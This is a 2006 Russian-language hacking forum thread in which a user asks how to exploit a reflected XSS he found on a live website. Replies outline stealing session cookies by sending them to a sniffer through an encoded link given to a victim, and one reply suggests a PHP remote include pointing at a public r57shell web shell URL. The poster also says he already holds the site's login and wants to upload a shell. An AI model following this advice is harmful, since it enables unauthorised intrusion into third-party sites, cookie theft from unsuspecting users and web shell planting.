что можно выжать из пасивной XSS

Discussion in 'Уязвимости' started by strecher, 6 Aug 2006.

  1. strecher

    strecher New Member

    Joined:
    22 Nov 2005
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    Вот нашёл страничку где я могу писать что хочу в адресной строке и это выводится на странице. Подскажите чтоб такого я мог бы сделать?

    Cкрин

    Думаю фильтра на знаки там нет
     
  2. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    А скрипты работают? Вмысле <script>alert()</script> работает?
     
  3. strecher

    strecher New Member

    Joined:
    22 Nov 2005
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    #3 strecher, 6 Aug 2006
    Last edited: 6 Aug 2006
  4. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    ДА че нам до твоих скринов...

    А там авторизация по кукам есть?
     
  5. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    пассивная хсс...если там авторизация есть, максимум что сможешь, это: подставишь в урл скрипт, отсылающий куки на снифер, закодируешь урл, дашь жертве урл, чтоб он зашел по этой ссылке...куки будут на снифере.
     
  6. red1rect

    red1rect New Member

    Joined:
    21 Mar 2006
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    А судя по второму скрину - там пхп иньекция, вместо antichat.ru поставь http://rst.void.ru/download/r57shell.txt?
     
    1 person likes this.
  7. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    там он фрейм вставляет ;)
     
  8. Tem

    Tem -

    Joined:
    5 Oct 2005
    Messages:
    557
    Likes Received:
    157
    Reputations:
    179
    Ты сперва КСС от ИНКЛУДА резлечи хоть.
     
  9. strecher

    strecher New Member

    Joined:
    22 Nov 2005
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    авторизация есть, но у меня уже есть username:password

    я просто в пхп нифига не понимаю
    если есть было бы хорошо визуальный шелл туда загрузить
     
    #9 strecher, 7 Aug 2006
    Last edited: 7 Aug 2006
  10. strecher

    strecher New Member

    Joined:
    22 Nov 2005
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    точней кое что понимаю т.к. знаю asp
     
  11. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    Ты сночала подумай точно это инклуд!

    Инклуд это не <Iframe src=[shell]>


    От Модера:
    рЫклама запрещается, причем там надо зарегистрироваться.Лучше ,ы скопировал сюда, а внизу поставил бы (це) нетсек поверед бай машка
    =)
     
    #11 bul.666, 7 Aug 2006
    Last edited by a moderator: 7 Aug 2006
  12. strecher

    strecher New Member

    Joined:
    22 Nov 2005
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    я сходил по этой ссылке: PHP-including

    и попробовал, только у меня не получается ковычки вставить для include src
    если я ковычки печатаю то всё что находится между ними появляется на странице даже если использую ` или '
    получается только если я вставляю какой нибудь таг в ковычкaх, к примеру здесь первое слово не появляется, а второе появляется

    <? echo "Whatever <br> Whenever" ?>